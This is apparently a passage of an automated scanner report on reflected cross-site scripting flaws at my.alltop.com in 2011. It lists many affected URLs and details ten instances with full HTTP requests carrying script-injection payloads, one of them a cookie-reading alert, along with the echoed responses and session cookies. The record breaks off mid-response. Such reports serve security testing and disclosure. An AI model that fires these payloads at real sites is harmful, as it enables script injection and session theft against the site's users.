1.267. http://my.alltop.com/img/mugs/ [nsextt parameter]

1.268. http://my.alltop.com/scottkelby [name of an arbitrarily supplied request parameter]

1.269. http://my.alltop.com/scripts/ ['"--> parameter]

1.270. http://my.alltop.com/scripts/ [name of an arbitrarily supplied request parameter]

1.271. http://my.alltop.com/scripts/ [nsextt parameter]

1.272. http://my.alltop.com/scripts/sifr/ ['"--> parameter]

1.273. http://my.alltop.com/scripts/sifr/ [name of an arbitrarily supplied request parameter]

1.274. http://my.alltop.com/scripts/sifr/ [nsextt parameter]



1. Cross-site scripting (reflected)
There are 274 instances of this issue:


1.1. http://my.alltop.com/ ['"--> parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /

Issue detail

The value of the '"--></style></script><script>netsparker(0x0000D5)</script> request parameter is copied into the HTML document as plain text between tags. The payload a28d1<script>alert(1)</script>48e872fc857 was submitted in the '"--></style></script><script>netsparker(0x0000D5)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?'"--></style></script><script>netsparker(0x0000D5)</script>a28d1<script>alert(1)</script>48e872fc857 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:34 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:40 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:40 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>a28d1<script>alert(1)</script>48e872fc857" method="post" accept-charset="utf-8">
...[SNIP]...

1.2. http://my.alltop.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca73b"><script>alert(1)</script>779bc52546d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ca73b"><script>alert(1)</script>779bc52546d=1 HTTP/1.1
Host: my.alltop.com
Proxy-Connection: keep-alive
Referer: http://sharepoint.alltop.com/favicon.icoa6c4d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E365c9a34273
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=160012002.1299617018.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-414054026-1299617018360; myAlltopSession=i4a5ogk64978pgcjhn10qfejb6; alltop_r=159; __utma=160012002.1234645092.1299617018.1299617018.1299617018.1; __utmc=160012002; __utmb=160012002.4.9.1299617157503; __qseg=Q_D|Q_T|Q_2891|Q_2782|Q_2781|Q_2369|Q_2361|Q_2360|Q_2359|Q_2358|Q_2357|Q_2356|Q_2342|Q_1213|Q_1153|Q_1152|Q_1151|Q_1150|Q_1145|Q_1144|Q_982

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:46:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:46:17 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=i4a5ogk64978pgcjhn10qfejb6; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:46:17 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_v=61f39401b0ae6399f7652d03a5d18087; expires=Fri, 05-Mar-2021 20:46:17 GMT; path=/; domain=my.alltop.com
Set-Cookie: alltop_r=159_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:46:17 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/?ca73b"><script>alert(1)</script>779bc52546d=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.3. http://my.alltop.com/ [nsextt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85463"><script>alert(1)</script>a2078c7438c was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000002)%3C/script%3E85463"><script>alert(1)</script>a2078c7438c HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:05 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:06 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:06 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000002)%3C/script%3E85463"><script>alert(1)</script>a2078c7438c" method="post" accept-charset="utf-8">
...[SNIP]...

1.4. http://my.alltop.com/adamengst [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /adamengst

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b4c3"><script>alert(1)</script>08410fd8a0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adamengst?9b4c3"><script>alert(1)</script>08410fd8a0d=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:52 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:52 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_45; expires=Mon, 06-Jun-2011 20:48:52 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 99031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/adamengst?9b4c3"><script>alert(1)</script>08410fd8a0d=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.5. http://my.alltop.com/adamengst [nsextt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /adamengst

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c40f6"><script>alert(1)</script>6701be010eb was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adamengst?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F3)%3C/script%3Ec40f6"><script>alert(1)</script>6701be010eb HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:01 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:02 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_45; expires=Mon, 06-Jun-2011 20:51:02 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 99367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/adamengst?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F3)%3C/script%3Ec40f6"><script>alert(1)</script>6701be010eb" method="post" accept-charset="utf-8">
...[SNIP]...

1.6. http://my.alltop.com/alisonvandiggelen [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alisonvandiggelen

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4e36"><script>alert(1)</script>d5f6676974f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alisonvandiggelen?f4e36"><script>alert(1)</script>d5f6676974f=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:13 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:14 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_15656; expires=Mon, 06-Jun-2011 20:49:14 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 92119

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alisonvandiggelen?f4e36"><script>alert(1)</script>d5f6676974f=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.7. http://my.alltop.com/alisonvandiggelen [nsextt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alisonvandiggelen

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93c4e"><script>alert(1)</script>8ffe2b108 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alisonvandiggelen?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000219)%3C/script%3E93c4e"><script>alert(1)</script>8ffe2b108 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_45
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:17 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:18 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_45_15656; expires=Mon, 06-Jun-2011 20:51:18 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 92447

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alisonvandiggelen?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000219)%3C/script%3E93c4e"><script>alert(1)</script>8ffe2b108" method="post" accept-charset="utf-8">
...[SNIP]...

1.8. http://my.alltop.com/alpha/ ['"--> parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/

Issue detail

The value of the '"--></style></script><script>netsparker(0x000143)</script> request parameter is copied into the HTML document as plain text between tags. The payload 47584<script>alert(1)</script>6ff2ed5c8b2 was submitted in the '"--></style></script><script>netsparker(0x000143)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/?'"--></style></script><script>netsparker(0x000143)</script>47584<script>alert(1)</script>6ff2ed5c8b2 HTTP/1.1
Referer: http://my.alltop.com/alpha/a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:57 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:57 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:57 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24658

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>47584<script>alert(1)</script>6ff2ed5c8b2" method="post" accept-charset="utf-8">
...[SNIP]...

1.9. http://my.alltop.com/alpha/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5781"><script>alert(1)</script>6e43a20818d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/?d5781"><script>alert(1)</script>6e43a20818d=1 HTTP/1.1
Referer: http://my.alltop.com/alpha/a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:38 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:41 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:41 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/?d5781"><script>alert(1)</script>6e43a20818d=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.10. http://my.alltop.com/alpha/ [nsextt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa79a"><script>alert(1)</script>cbd44e0cb8a was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000BF)%3C/script%3Efa79a"><script>alert(1)</script>cbd44e0cb8a HTTP/1.1
Referer: http://my.alltop.com/alpha/a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:23 GMT
